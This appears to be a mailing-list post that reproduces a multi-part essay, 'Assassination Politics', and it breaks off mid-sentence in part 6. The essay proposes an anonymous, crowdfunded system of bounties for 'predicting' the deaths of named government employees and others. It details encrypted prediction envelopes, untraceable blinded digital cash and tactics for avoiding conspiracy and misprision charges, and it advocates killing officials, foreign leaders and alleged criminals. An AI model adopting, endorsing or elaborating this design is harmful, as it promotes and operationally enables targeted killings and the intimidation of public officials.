>2.  Protection will no longer depend on having a "government."
>>3.  Anonymous networking technology will protect our rights, to the extent
>>they can be protected.
>>4.  Your statement, "...anarchy is a massive step backward..." is absolutely
>>incorrect.

>That's fine that you believe the things, but for acceptance by others you
>will have to provide support for your position.  I, personally, would like
>to see your premises so that I may evualuate your claims.  You may indeed
>be correct in your assessment.

Well, here's  my "Assassination Politics" essay.

[Part 1]
I've been following the concepts of digital cash and encryption, since
I read the article in the August 1992 issue of Scientific American on
"encrypted signatures."  While I've only followed the Digitaliberty area
for a few weeks, I can already see a number of points that do (and
should!) strongly concern the average savvy individual:

1.  How can we translate the freedom afforded by the Internet to
ordinary life?

2.  How can we keep the government from banning encryption, digital
cash, and other systems that will improve our freedom?


A few months ago, I had a truly and quite literally "revolutionary"
idea, and I jokingly called it "Assassination Politics": I speculated on
the question of whether an organization could be set up to _legally_
announce either that it would be awarding a cash prize to somebody who
correctly "predicted" the death of one of a list of violators of
rights, usually either government employees, officeholders, or
appointees.  It could ask for anonymous contributions from the public,
and individuals would be able send those contributions using digital
cash.

I also speculated that using modern methods of public-key encryption and
anonymous "digital cash," it would be possible to make such awards in
such a way so that nobody knows who is getting awarded the money, only
that the award is being given.   Even the organization itself would have
no information that could help the authorities find the person
responsible for the prediction, let alone the one who caused the death.

It was not my intention to provide such a "tough nut to crack" by
arguing the general case, claiming that a person who hires a hitman is
not guilty of murder under libertarian principles.  Obviously, the
problem with the general case is that the victim may be totally innocent
under libertarian principles, which would make the killing a crime,
leading to the question of whether the person offering the money was
himself guilty.

On the contrary; my speculation assumed that the "victim" is a
government employee, presumably one who is not merely taking a paycheck
of stolen tax dollars, but also is guilty of extra violations of rights
beyond this. (Government agents responsible for the Ruby Ridge incident
and Waco come to mind.)  In receiving such money and in his various
acts, he violates the "Non-aggression Principle" (NAP) and thus,
presumably, any acts against him are not the initiation of force under
libertarian principles.

The organization set up to manage such a system could, presumably, make
up a list of people who had seriously violated the NAP, but who would
not see justice in our courts due to the fact that their actions were
done at the behest of the government.  Associated with each name would
be a dollar figure, the total amount of money the organization has
received as a contribution, which is the amount they would give for
correctly "predicting" the person's death, presumably naming the exact
date.  "Guessers" would formulate their "guess" into a file, encrypt it
with the organization's public key, then transmit it to the organization,
possibly using methods as untraceable as putting a floppy disk in an
envelope and tossing it into a mailbox, but more likely either a cascade
of encrypted anonymous remailers, or possibly public-access Internet
locations, such as terminals at a local library, etc.

In order to prevent such a system from becoming simply a random unpaid
lottery, in which people can randomly guess a name and date (hoping that
lightning would strike, as it occasionally does), it would be necessary
to deter such random guessing by requiring the "guessers" to include
with their "guess" encrypted and untraceable "digital cash," in an
amount sufficiently high to make random guessing impractical.

For example, if the target was, say, 50 years old and had a life
expectancy of 30 years, or about 10,000 days, the amount of money
required to register a guess must be at least 1/10,000th of the amount
of the award.  In practice, the amount required should be far higher,
perhaps as much as 1/1000 of the amount, since you can assume that
anybody making a guess would feel sufficiently confident of that guess
to risk 1/1000th of his potential reward.

The digital cash would be placed inside the outer "encryption envelope,"
and could be decrypted using the organization's public key.  The
prediction itself (including name and date) would be itself in another
encryption envelope inside the first one, but it would be encrypted
using a key that is only known to the predictor himself.  In this way,
the organization could decrypt the outer envelope and find the digital
cash, but they would have no idea what is being predicted in the
innermost envelope, either the name or the date.

If, later, the "prediction" came true, the predictor would presumably
send yet another encrypted "envelope" to the organization, containing
the decryption key for the previous "prediction" envelope, plus a public
key (despite its name, to be used only once!) to be used for encryption
of digital cash used as payment for the award. The organization would
apply the decryption key to the prediction envelope, discover that it
works, then notice that the prediction included was fulfilled on the
date stated.   The predictor would be, therefore, entitled to the award.
Nevertheless, even then nobody would actually know WHO he is!

It doesn't even know if the predictor had anything to do with the
outcome of the prediction.  If it received these files in the mail, in
physical envelopes which had no return address, it would have burned the
envelopes before it studied their contents.  The result is that even the
active cooperation of the organization could not possibly help anyone,
including the police, to locate the predictor.)

Also included within this "prediction-fulfilled" encryption envelope
would be unsigned (not-yet-valid) "digital cash," which would then be
blindly signed by the organization's bank and subsequently encrypted
using the public key included. (The public key could also be publicized,
to allow members of the public to securely send their comments and,
possibly, further grateful remuneration to the predictor, securely.)
The resulting encrypted file could be published openly on the Internet,
and it could then be decrypted by only one entity:  The person who had
made that original, accurate prediction.  The result is that the
recipient would be absolutely untraceable.

The digital cash is then processed by the recipient by "unblinding" it,
a principle which is explained in far greater detail by an article in
the August 1992 issue of Scientific American.  The resulting digital
cash is absolutely untraceable to its source.

This overall system achieves a number of goals.  First, it totally hides
the identity of the predictor to the organization, which makes it
unnecessary for any potential predictor to "trust" them to not reveal
his name or location.  Secondly, it allows the predictor to make his
prediction without revealing the actual contents of that prediction
until later, when he chooses to, assuring him that his "target" cannot
possibly get early warning of his intent.   (and "failed" predictions
need never be revealed).  In fact, he needs never reveal his prediction
unless he wants the award. Third, it allows the predictor to anonymously
grant his award to anyone else he chooses, since he may give this
digital cash to anyone without fear that it will be traced.

For the organization, this system also provides a number of advantages.
By hiding the identity of the predictor from even it, the organization
cannot be forced to reveal it, in either civil or criminal court.  This
should also shield the organization from liability, since it will not
know the contents of any "prediction" until after it came true.  (Even
so, the organization would be deliberately kept "poor" so that it would
be judgment-proof.)  Since presumably most of the laws the organization
might be accused of violating would require that the violator have
specific or prior knowledge, keeping itself ignorant of as many facts as
possible, for as long as possible, would presumably make it very
difficult to prosecute.

[end part 1]

[part 2]

"At the Village Pizza shop, as they were sitting down to consume a
pepperoni, Dorothy asked Jim, 'So what other inventions are you working
on?"  Jim replied, 'I've got a new idea, but it's really revolutionary.
Literally REVOLUTIONARY.'   'Okay, Jim, which government are you
planning to overthrow?,' she asked, playing along.
'All of them,' answered Jim."

Political Implications
Imagine for a moment that as ordinary citizens were watching the
evening news, they see an act by a government employee or  officeholder
that they feel violates their rights, abuses the public's trust, or
misuses the powers that they feel should be limited.  A person whose
actions are so abusive or improper that the citizenry shouldn't have to
tolerate it.

What if they could go to their computers, type in the miscreant's name,
and select a dollar amount:  The amount they, themselves, would be
willing to pay to anyone who "predicts" that officeholder's death.  That
donation would be sent, encrypted and anonymously, to a central
registry organization, and be totaled, with the total amount available
within seconds to  any interested individual.  If only 0.1% of the
population, or one person in a thousand, was willing to pay $1 to see
some government slimeball dead, that would be, in effect, a $250,000
bounty on his head.

Further, imagine that anyone considering collecting that bounty could do
so with the mathematical certainty that he can't possibly be identified,
and could collect the reward without meeting, or even talking to,
anybody who could later identify him.  Perfect anonymity, perfect
secrecy, and perfect security.  And that, combined with the ease and
security with which these contributions could be collected, would make
being an abusive government employee an extremely risky proposition.
Chances are good that nobody above the level of county commissioner
would even risk staying in office.

Just how would this change politics in America?  It would take far less
time to answer, "What would remain the same?"  No longer would we be
electing people who will turn around and  tax us to death, regulate us
to  death, or for that matter sent hired thugs to kill us when we oppose
their wishes.

No military?

One of the attractive potential implications of such a system would be
that we might not even need a military to protect the country.  Any
threatening or abusive foreign leader would be subject to the same
contribution/assassination/reward system, and it would operate just as
effectively over borders as it does domestically.

This country has learned, in numerous examples subsequent to many wars,
that once the political disputes between leaders has ceased, we
(ordinary citizens) are able to get along pretty well with the citizens
of other countries.  Classic examples are post-WWII Germany, Japan, and
Italy, and post-Soviet Russia, the Eastern bloc, Albania, and many
others.

Contrary examples are those in which the political dispute remains, such
as North Korea, Vietnam, Iraq, Cuba, Red China, and a few others.  In
all of these examples, the opposing leadership was NOT defeated, either
in war or in an internal power struggle. Clearly, it is not the PEOPLE
who maintain the dispute, but the leadership.

Consider how history might have changed if we'd been able to "bump off"
Lenin, Stalin, Hitler, Mussolini, Tojo,  Kim Il Sung, Ho Chi Minh,
Ayatollah Khomeini, Saddam Hussein, Moammar Khadafi, and various others,
along with all of their replacements if necessary, all for a measly few
million dollars, rather than the billions of dollars and millions of
lives that subsequent wars cost.

But that raises an interesting question, with an even more interesting
answer.  "If all this is so easy, why hasn't this been done before?"   I
mean, wars are destructive, costly, and dangerous, so why hasn't some
smart politician figured out that instead of fighting the entire
country, we could just 'zero' the few bad guys on the top?

The answer is quite revealing, and strikingly "logical":  If we can kill
THEIR leaders, they can kill OUR leaders too.   That would avoid the
war, but the leadership on both sides would be dead, and guess who is
making the decisions about what to do?  That's right, the LEADERS!

And the leaders (both theirs and ours!) would rather see 30,000,000
ordinary people die in WWII than lose their own lives, if they can get
away with it.   Same in Korea, Vietnam, Gulf War, and numerous other
disputes around the globe.  You can see that as long as we continue to
allow leaders, both "ours" and "theirs," to decide who should die, they
will ALWAYS choose the ordinary people of each country.

One reason the leaders have been able to avoid this solution is simple:
While it's comparatively easy to "get away with murder," it's a lot
harder to reward the person who does it, and that person is definitely
taking a serious risk.   (Most murders are solved based on some prior
relationship between the murder and victim, or observations of witnesses
who know either the murderer or the victim.)

Historically, it has been essentially impossible to adequately motivate
a assassin, ensuring his safety and anonymity  as well, if only because
it has been impossible to PAY him in a form that nobody can trace, and
to ensure the silence of all potential witnesses. Even if a person was
willing to die in the act, he would want to know that the people he
chooses would get the  reward, but if they themselves were identified
they'd be targets of revenge.

All that's changed with the advent of public-key encryption and digital
cash.  Now, it should be possible to announce a standing offer to all
comers that a large sum of digital cash will be sent to him in an
untraceable fashion should he meet certain "conditions," conditions
which don't even have to include proving (or, for that matter, even
claiming) that he was somehow responsible for a death.


I believe that such a system has tremendous implications for the future
of freedom.  Libertarians in particular (and I'm a libertarian) should
pay particular attention to the fact that this system "encourages" if
not an anarchist outcome, at least a minarchist (minimal government)
system, because no large governmental structure could even survive in
its current form.

In fact, I would argue that this system would solve a potential
problem, occasionally postulated, with the adoption of libertarianism in
one country, surrounded by non-libertarian states.  It could have
reasonably been suspected that in a gradual shift to a libertarian
political and economic system, remnants of a non-libertarian system such
as a military would have to survive, to protect society against the
threats represented by foreign states.  While certainly plausible, it
would have been hard for an average naive person to imagine how the
country would maintain a $250 billion military budget, based on
voluntary contributions.

The easy answer, of course, is that military budgets of that size would
simply not happen in a libertarian society.  More problematic is the
question of how a country would defend itself, if it had to raise it
defenses by voluntary contribution.   An equally simplistic answer is
that this country could probably be defended just fine on a budget 1/2
to 1/3 of the current budget.  True, but that misses the point.

The real answer is even simpler.  Large armies are only necessary to
fight the other large armies organized by the leadership of other,
non-libertarian states, presumably against the will of their citizenry.
Once the problem posed by _their_ leadership is solved (as well as ours;
either by their own citizenry by similar anonymous contributions, or by
ours), there will be no large armies to oppose.

[end of part 2]

[part 3]

In the 1960's movie, "The Thomas Crown Affair," actor Steve McQueen
plays a bored multi-millionaire who fights tedium by arranging
well-planned high-yield bank robberies.  He hires each of the robbers
separately and anonymously, so that they can neither identify him or
each other. They arrive at the bank on schedule, separately but
simultaneously, complete the robbery, then separate forever.  He pays
each robber out of his own funds, so that the money cannot be traced,
and he keeps the proceeds of each robbery.

In my recent essay generally titled "Digitaliberty," or earlier
"Assassination politics," I hypothesized that it should be possible to
LEGALLY set up an organization which collects perfectly anonymous
donations sent by members of the public, donations which instruct the
organization to pay the amount to any person who correctly guesses the
date of death of some named person, for example some un-favorite
government employee or officeholder.  The organization would totalize
the amounts of the donations for each different named person, and
publish that list (presumably on the Internet) on a daily or perhaps
even an hourly basis, telling the public exactly how much a person would
get for "predicting" the death of that particular target.

Moreover, that organization would accept perfectly anonymous,
untraceable, encrypted "predictions" by various means, such as the
Internet (probably through chains of encrypted anonymous remailers), US
mail, courier, or any number of other means.  Those predictions would
contain two parts:  A small amount of untraceable "digital cash," inside
the outer "digital envelope," to ensure that the "predictor" can't
economically just randomly choose dates and names, and an inner
encrypted data packet which is encrypted so that even the organization
itself cannot decrypt it.  That data packet would contain the name of
the person whose death is predicted, and the date it is to happen.

This encrypted packet could also be published, still encrypted, on the
Internet, so as to be able to prove to the world, later, that SOMEBODY
made that prediction before it happened, and was willing to "put money
on it" by including it in outside the inner encrypted "envelope."   The
"predictor" would always lose the outer digital cash; he would only earn
the reward if his (still-secret) prediction later became true.  If,
later on, that prediction came true, the "lucky" predictor would
transmit the decrypt key to the organization, untraceably, which would
apply it to the encrypted packet, and discover that it works, and read
the prediction made hours, days, weeks, or even months earlier.   Only
then would the organization, or for that matter anyone else except the
predictor, know the person or the date named.

Also included in that inner encrypted digital "envelope" would be a
public-key, generated by the predictor for only this particular purpose:
It would not be his "normal" public key, obviously, because _that_
public key would be identifiable to him.  Also present in this packet
would be "blinded" (not yet certified as being good) "digital cash"
codes, codes that would be presented to a certifying bank for their
digital "stamp of approval," making them worth the dollars that the
predictor has earned. (This presentation could be done indirectly, by an
intermediary, to prevent a bank from being able to refuse to deal with
the organization.)

Those "digital cash" codes will then be encrypted using the public key
included with the original prediction, and published in a number of
locations, perhaps on the Internet in a number of areas, and available
by FTP to anyone who's interested.  (It is assumed that this data will
somehow get to the original predictor.  Since it will get to "everyone"
on the Internet, it will presumably be impossible to know where the
predictor is.)  Note, however, that only the person who sent the
prediction (or somebody he's given the secret key to in the interim) can
decrypt that message, and in any case only he, the person who prepared
the digital cash blanks, can fully "unblind" the digital cash to make it
spendable, yet absolutely untraceable.   (For a much more complete
explanation of how so-called "digital cash" works, I refer you to the
August 1992 issue of Scientific American.)

This process sounds intricate, but it (and even some more detail I
haven't described above) is all necessary to:
1.  Keep the donors, as well as the predictors, absolutely anonymous,
not only to the public and each other, but also to the organization
itself, either before or after the prediction comes true.
2.  Ensure that neither the organization, nor the donors, nor the
public, is aware of the contents of the "prediction" unless and until
it later becomes true.  (This ensures that none of the other
participants can be "guilty" of knowing this, before it happens.)
3.  Prove to the donors (including potential future predictors), the
organization, and the public that indeed, somebody predicted a
particular death on a particular date, before it actually happened.
4.  Prove to the donors and the public (including potential future
predictors) that the amount of money promised was actually paid to
whomever made the prediction that later came true.   This is important,
obviously, because you don't want any potential predictor to doubt
whether he'll get the money if he makes a successful prediction, and you
don't want any potential donor to doubt that his money is actually going
to go to a successful predictor.
5.  Prevent the organization and the donors and the public from knowing,
for sure, whether the predictor actually had anything to do with the
death predicted.  This is true even if (hypothetically) somebody is
later caught and convicted of a murder, which was the subject of a
successful "prediction":  Even after identifying the murderer through
other means, it will be impossible for anyone to know if the murderer
and the predictor were the same person.
6.   Allow the predictor, if he so chooses, to "gift" the reward
(possibly quite anonymously) to any other person, one perhaps totally
unaware of the source of the money, without anyone else knowing of this.

Even the named "target" (the "victim") is also assured of something: He
is assured that literally anyone in the world, from his worst enemy to
his best friend, could make the amount of the reward, absolutely
anonymously, should they "predict" his death correctly.  At that point,
he will have no friends.

This may represent the ultimate in compartmentalization of information:
Nobody knows more than he needs to, to play his part in the whole
arrangement.  Nobody can turn anyone else in, or make a mistake that
identifies the other participants.  Yet everyone can verify that the
"game" is played "fairly":  The predictor gets his money, as the donors
desire.  Potential future predictors are satisfied (in a mathematically
provable fashion) that all previous successful predictors were paid
their full rewards, in a manner that can't possibly be traced.  The
members of the public are assured that, if they choose to make a
donation, it will be used as promised.

This leads me to a bold assertion:  I claim that, aside from the
practical difficulty  and perhaps, theoretical impossibility of
identifying either the donors or the predictor, it is very likely that
none of the participants, with the (understandable) hypothetical
exception of a "predictor" who happens to know that he is also a
murderer, could actually be considered "guilty" of any violation of
black-letter law. Furthermore, none of the participants including the
central organization is aware, either before or after the "prediction"
comes true, that any other participant was actually in violation of any
law, or for that matter would even know (except by watching the news)
that any crime had actually been committed.

After all, the donors are merely offering gifts to a person who makes a
successful prediction, not for any presumed responsibility in a killing,
and the payment would occur even if no crime occurred. The organization
is merely coordinating it all, but again isolating itself so that it
cannot know from whom the money comes, or to whom the money eventually
is given, or whether a crime was even committed. (Hypothetically, the
"predictor" could actually be the "victim," who decides to kill himself
and "predict" this, giving the proceeds of the reward to his chosen
beneficiary, perhaps a relative or friend.  Ironically, this might be
the best revenge he can muster, "cheating the hangman," as it were.)

In fact, the organization could further shield itself by adopting a
stated policy that no convicted (or, for that matter, even SUSPECTED)
killers could receive the payment of a reward.  However, since the
recipient of the reward is by definition unidentified and untraceable
even in theory, this would be a rather hollow assurance since it has no
way to prevent such a payment from being made to someone responsible.

[end of part 3]

[part 4]

In part 3, I claimed that an organization could quite legally operate,
assisted by encryption, international data networking, and untraceable
digital cash, in a way that would (indirectly) hasten the death of named
people, for instance hated government employees and officeholders.  I
won't attempt to "prove" this, for reasons that I think will be obvious.
First, even if such operation were indeed "legal," that fact alone would
not stop its opponents from wanting to shut it down.  However, there is
also another way of looking at it:  If this system works as I expect it
would, even its claimed "illegality" would be irrelevant, because it
could operate over international borders and beyond the legal reach of
any law-abiding government.

Perhaps the most telling fact, however, is that if this system was as
effective as it appears it would be, no prosecutor would dare file
charges against any participant, and no judge would hear the case,
because no matter how long the existing list of "targets," there would
always be room for one or two more.  Any potential user of this system
would recognize that an assault on this system represents a threat to
its future availability, and would act accordingly by donating money to
target anyone trying to shut it down.

Even so, I think I should address two charges which have been made,
apparently quite simplistically, claiming that an implementation of this
idea would violate the law.  Specifically:  "Conspiracy to commit
murder" and "misprision of felony."

As I understand it, in order to have a "conspiracy" from a criminal
standpoint, it is necessary to have at least two people agree to commit
a crime, and have some overt act in furtherance of that crime.

  Well, this charge already "strikes  out" because in the plan I
described, none of the participants _agrees_ with ANYONE to commit a
crime.  None of the participants even informs anyone else that he will
be committing a crime, whether before or after the fact.  In fact, the
only crime appears (hypothetically; this assumes that a crime was
actually committed) to be a murder committed by a single individual, a
crime unknown to the other participants, with his identity similarly
unknown.

Remember, the "prediction" originally sent in by the predictor was fully
encrypted, so that the organization (or anyone else, for that matter)
would be unable to figure out the identity of the person whose death was
predicted, or the date on which it was predicted to occur.  Thus, the
organization is incapable of "agreeing" with such a thing, and likewise
the donors as well.  Only if the prediction later came true would the
decrypt key arrive, and only then would the organization (and the
public) be made aware of the contents. Even then, it's only a
"prediction," so even then, nobody is actually aware of any crime which
can be associated with the predictor.

"Misprision of Felony"

This crime, sort of a diluted form of "accessory before and/or after the
fact," was claimed to qualify by "Tim of Angle," who subsequent to my
answer to him on this subject has totally failed to support his initial
claim.   (a recent curiosity is that this crime is one that has been
charged against Michael Fortier, the person who claims he helped OKC
bombing suspect Tim McVeigh "case the joint" at the Federal building.)

I include it here, nevertheless, because his simplistic (and un-careful)
reading of my idea led him to perhaps the "closest" law that one might
allege that the participants would have broken. Tim claimed:

TOA> No. That's called "misprision of felony" and makes you an accessory
TOA> before the fact. Arguably, under the felony murder rule you could get
TOA> capital punishment in a state that has such.

However, I did a little library research, checking Black's Law
Dictionary.  Here is the entry for this item: "Misprision of felony. The
offense of concealing a felony committed by another, but without such
previous concert with or subsequent assistance to the felon as would
make the party concealing an accessory before or after the fact. United
State s v. Perlstein, C.C.A.N.J., 126 F.2d 789, 798. Elements of the
crime are that the principal committed and completed the felony alleged,
that the defendant had full knowledge of that fact, that the defendant
failed to notify the authorities, and that defendant took an affirmative
step to conceal the crime.  U.S. v. Ciambrone, C.A. Nev., 750 F.2d 1416,
1417.  Whoever, having knowledge of the actual commission of a felony
cognizable by a court of the United States, conceals and does not as
soon as possible make known the same to some judge or other person in
civil or military authority under the United States, is guilty of the
federal crime of misprision of felony. 18 U.S.C.A 4." See also
Obstructing Justice. ++++++++++end of Black's law Dictionary Entry

The only "element" of this crime which is arguably satisfied is the
first: Some person (_other_than_ the defendant for "misprision of
felony") committed a crime.  The second element fails miserably: "...
that the defendant had full knowledge of that fact... " My previous
commentary makes it clear that far from "full knowledge of that fact,"
other participants are carefully prevented from having ANY "knowledge of
that fact."

The third element, "..that the defendant failed to notify the
authorities..." is also essentially non-existent: No other participants
have any information as to the identity of a predictor, or his location,
or for that matter whether he has had any involvement in any sort
of
crime.  In fact, it would be possible for each of the other partiipants to
deliver (anonymously, presumably) 
copies of all correspondence
they have sent, to the police or other agency, and that correspondence
would not help the authorities even slightly to identify a criminal or
even necessarily a crime.

In fact, normal operation of this organization would be to publicize
"all" correspondence it receives, in order to provide feedback to the
public to assure them that all participants are fulfilling their
promises and receiving their rewards. This publication would presumably
find its way to the police, or it could even be mailed to them on a
regular basis to prevent any suggestion that the organization was
"fail[ing] to notify authorities." Nevertheless, none of this material
could help any authorities with their investigations, to their dismay.

The fourth and last element of the crime of "misprision of felony",
"...and that defendant took an affirmative step to conceal the crime,"
would totally fail.  The organization would not " conceal" the crime. In
fact, it will have no ability to do anything to the contrary, if for no
other reason that it _has_ no knowledge of the crime!  And as described
above, it would carefully avoid having access to any information that
could help solve the crime, and thus it would escape any obligations
along these lines.

Summary:

In hindsight, it is not surprising that such an organization could
operate legally within the US, although at least initially not without
political opposition.  First, this is at least nominally supposed to be
a "free country," which should mean that police and other authorities
aren't able to punish behavior just because they don't like it.

Secondly, it is obvious that most laws today were originally written
during an era in which laws assumed that "conspirators" at least knew
each other, had met each other, could identify each other, or had (at
least!) talked to each other. On the contrary, in my scenario none of
the participants even know on what continent any of the others reside,
let alone their country, city, or street.  They don't know what they
look like, sound like, or for that matter even "type like":  None of
their prose, save a few sparse "predictions," ever get communicated to
anyone else, so even text-comparison programs would fail to "target"
anyone.

Equally surprising (to those who originally wrote the laws against
"conspiracy") would be "Person A's" ability to satisfy himself that
"Person B" deserves the award, without knowing that "Person B" is (or is
not) actually responsible for a particular death.
[end of part 4]

[part 5]

In the previous four notes on the subject of Digitaliberty, I've
suggested that this concept (collecting anonymous donations to, in
effect, "purchase" the death of an un-favorite government employee)
would force a dramatic reduction of the size of government at all
levels, as well as achieving what will probably be a "minarchist"
(minimal government) state at a very rapid rate. Furthermore, I pointed
out that I thought that this effect would not merely affect a single
country or continent, but might in fact spread through all countries
essentially simultaneously.

But in addition to such (apparently) grandiose claims, it occurs to me
that there must be other changes to society that would simultaneously
occur with the adoption of such a system.  After all, a simplistic view
of my idea might lead one to the conclusion that there would be almost
no governmental structure left after society had been transformed.
Since our current "criminal justice system" today is based totally on
the concept of "big government," this would lead a naive person to
wonder how concepts such as "justice," "fairness," "order," and for that
matter protection of individual rights can be accomplished in such a
society.

Indeed, one common theme I've seen in criticisms of my idea is the fear
that this system would lead to "anarchy."  The funny thing about this
objection is that, technically, this could easily be true.  But
"anarchy" in real life may not resemble anything like the "anarchy"
these people claim to fear, which leads me to respond with a quote whose
origin I don't quite remember:

"Anarchy is not lack of order.  Anarchy is lack of ORDERS."

People presumably will continue to live their lives in a calm, ordered
manner.  Or, at least as calm and ordered as they WANT to.  It won't be
"wild in the streets," and they won't bring cannibalism back as a
national sport, or anything like that.

It occurs to me that probably one of the best ways to demonstrate that
my idea, "assassination politics" (perhaps inaptly named, in view of the
fact that its application is far greater than mere politics), would not
result in "lack of order" is to show that most if not all of the
DESIRABLE functions of the current so-called "criminal justice system"
will be performed after its adoption.  This is true even if they will be
accomplished through wholly different methods and, conceivably, in
entirely different ways than the current system does.

I should probably first point out that it is not my intention to
re-write the book of minarchist theory.  I would imagine that over the
years, there has been much written about how individuals and societies
would function absent a strong central government, and much of that
writing is probably far more detailed and well-thought-out  than
anything I'll describe here.


One reason that ALMOST ANY "criminal justice system" would be better and
more effective than the one we currently possess is that, contrary to
the image that officialdom would try to push, anyone whose job depends
on "crime" has a strong vested interest in _maintaining_ a high level of
crime, not eliminating it.  After all, a terrorized society is one that
is willing to hire many cops and jailers and judges and lawyers, and to
pay them high salaries.  A safe, secure society is not willing to put up
with that.  The "ideal" situation, from the limited and self-interested
standpoint of the police and jailers, is one that maximizes the number
of people in prison, yet leaves most of the really dangerous criminals
out in the streets, in order to maintain justification for the system.
That seems to be exactly the situation we have today, which is not
surprising when you consider that the police have had an unusually high
level of input into the "system" for many decades.

The first effect of my idea would be, I think, to generally eliminate
prohibitions against acts which have no victims, or "victimless crimes."
Classic examples are laws against drug sales and use, gambling,
prostitution, pornography, etc.  That's because the average
(unpropagandized) individual will have very little concern or sympathy
for punishing an act which does not have a clear victim.  Without a
large, central government to push the propaganda, the public will view
these acts as certainly not "criminal," even if still generally
undesirable by a substantial minority for a few years. Once you get rid
of such laws, the price of currently-illegal drugs would drop
dramatically, probably by a factor of 100.  Crime caused by the need to
get money to pay for these drugs would drop drastically, even if you
assume that drug usage increased due to the lowering of the price.

Despite this massive reduction in crime, perhaps as much as 90%, the
average person is still going to want to know what "my system" would do
about the residual, "real" crime rate.  You know, murder, rape, robbery,
burglary, and all that.   Well, in the spirit of the idea, a simplistic
interpretation would suggest that an individual could target the
criminal who victimizes him, which would put an end to that criminal
career.

Some might object, pointing out that the criminal is only identified in
a minority of crimes. That objection is technically correct, but it's
also a bit misleading. The truth is that the vast majority of
"victim"-type crime is committed by a relatively tiny fraction of the
population who are repeat criminals.  It isn't necessary to identify
them in a vast majority of their crimes; statistically you'll eventually
find out who they are.

For example, even if the probability of a car thief getting caught, per
theft, is only 5%, there is at least a 40% probability of getting caught
after 10 thefts, and a 65% chance after 20 thefts.  A smart car-theft
victim would be happy to donate money targeting ANY discovered
car-thief, not necessarily just the one who victimized him.

The average car-owner would be wise to offer such donations
occasionally, as "insurance" against the possibility of his being
victimized some day:  An average donation of 1 cent per day per car
would constitute $10,000 per day for a typical city of 1 million cars.
Assuming that amount is far more than enough to get a typical car
thief's "friends" to "off" him, there is simply no way that a
substantial car-theft subculture could possibly be maintained.

Another alternative is that insurance companies would probably get into
the act:  Since they are going to be the financial victims of thefts of
their insured's property, it is reasonable to suppose that they would be
particularly inclined to deter such theft. It is conceivable that
current-day insurance companies would transmogrify themselves into
investigation/deterrence agencies, while maintaining their insurance
role, in view of the fact that they have the most to lose.  This is
particularly true because if "assassination politics" (as applied to
criminals and crime) comes about, they could then actually DO SOMETHING
about the problem, rather than merely reporting on the statistics to
their customers and stockholders.

Such companies would also have a strong motivation to provide a workable
system of rewards for solving crimes and identifying criminals, rewards
that (naturally enough!) can be given out totally anonymously.

While I would like to talk about the other advantage of this new kind of
justice, the fact that politicians and other government employees would
no longer have de-facto immunity in most cases, the reality is that
since we would no longer HAVE "politicians and other government
employees," to mention that advantage would be redundant.

The principle is valid, however: In today's system, you can have people
known to be guilty of crimes, but not prosecuted because they are part
of "the system."  Classic examples would be heroes of the right (Oliver
North) and heroes of the left (Jim Wright) who either escape prosecution
or conviction for "political" or "bureaucratic" reasons.  With
"assassination politics" that would simply never happen.

[end part 5]

Assassination Politics Part 6

A frequent initial belief among people who have recently heard of my
"assassination politics" idea is the fear that this system will somehow
be "out of control":  It would end up causing the death of ordinary,
"undeserving" people.

This system, however, will not be without its own kind of "control."
Not a centralized control, decideable by a single individual, but a
decentralized system in which everyone gets an implicit "vote."   A good
analogy might be to consider a society in which everyone's house
thermostat is controlled to operate at a temperature which is set for
the entire country.  Each person's control input is taken as a "vote,"
whether to get hotter, colder, or to stay the same temperature.  The
central control computer adjusts the national setpoint temperature in
order to equalize the number of people who want the temperature colder
and hotter.  Each house is at the same, nationally-set temperature,
however.  Clearly, no one individual is in control of the setting.
Nevertheless, I think it would be generally agreed that this system
would never produce a REALLY "off the wall" temperature setting, simply
because so many people's inputs are used to determine the output.  Sure,
if a group of 10,000 kids decided (assisted by the Internet) together
to screw with the system, and they all set their houses' thermostat
inputs to "hotter," they could SLIGHTLY increase the overall setting,
but since there are probably about 100 million separate dwellings in the
US, their fiddlings will be drowned out by the vast majority of the
population's desires.  Is this system "out of control"?  True, it is out
of the "control" of any single individual, but nevertheless it is well
within the control of the population as a whole.

It turns out that "assassination politics" actually has a rather similar
control mechanism which, like the one I've described above.  First, I've
pointed out that if I were to operate a centralized system such as this,
I'd only accept donations naming people who are in violation of the
"Non-Initiation Of Force Principle" (NIOFP), well known to libertarians.
By this standard, government employees (who have accepted paychecks paid
for with funds stolen from citizenry by taxes) and criminals whose
crimes actually had a victim would be included.  Let's call this
hypothetical organization "Organization A," or OrgA for short.

True, somebody else might be a little less scrupulous, accepting
donations for the termination of ANYBODY regardless of whether he
"deserves" his fate. (Hypothetically, let's call them, "Organization B,"
or OrgB, for short.) However, I suggest that if it were explained to
most  potential donors (who, I suggest, would have "typical" levels of
scruples)  that if he patronizes OrgB, his interests wouldn't be
protected.  For example,  OrgB (if it survives and thrives) might later
come back to target HIM, because of some other donor.  OrgA would not.
Naturally, our "ethical" donor doesn't want this, so he would choose to
give his donation to the most "ethical" organization who will accept it.
This maximizes the benefit to him, and minimizes the potential harm.

Since BOTH organizations will accept donations for "deserving" victims,
while only OrgB will accept them for "just anybody," it is reasonable to
conclude that (capitalism being what it is) OrgB's rates (the percentage
of the price it keeps as profit) can be and will be higher for  its
donations. (that's because there is less competition in its area of
specialization.)  Thus, it would be more economical to target
"deserving" people through OrgA , and thus donors will be drawn to it.
In addition, OrgA  will become larger, more credible, believeable and
trustworthy, and more potential "guessors" (assassins?) will "work" its
system, and for lower average potential payments.  (all else being
equal.)  Even so, and ironically, the average donation level for people
listed by OrgA would likely be higher, since (if we assume these are
"deserving" people) more people will be contributing towards their
demise.

After all, if a potential donor wants to "hit" some government bigwig,
there will be PLENTY of other donors to share the cost with.  Millions
of donations of $1 to $10 each would be common and quite economical.  On
the other hand, if you just selected a target out of the telephone
directory, an "undeserving" target, you'll probably be the only person
wanting to see him dead, which means that you'll probably have to foot
the whole bill of perhaps $5K to $10K if you want to see any "action."
Add to that OrgB 's "cut," which will probably be 50%, and you're
talking $10K to $20K.   I contend that the likelihood of this kind of
thing actually happening will be quite low, for "undeserving victims."

Now, the die-hards among you will probably object to the fact that even
this tiny residual possibility is left.  But consider:  Even _today_ it
would be quite "possible" for you to pick a name randomly out of a list,
find him and kill him yourself.   Does this frequently happen?
Apparently not.  For just one thing, there's no real motive.  Unless you
can show that the application of "assassination politics" would
dramatically increase the likelihood of such incidents, I suggest that
this "problem" will likely not be a problem after all.

For a while, I thought that the "lack of a motive" protection was
momentarily overturned by a hypothetical:  I thought, suppose a person
used this system as part of a sophisticated extortion scheme, in which
he sends an anonymous message to some rich character, saying something
like "pay me a zillion dollars anonymously, or I put out a digital
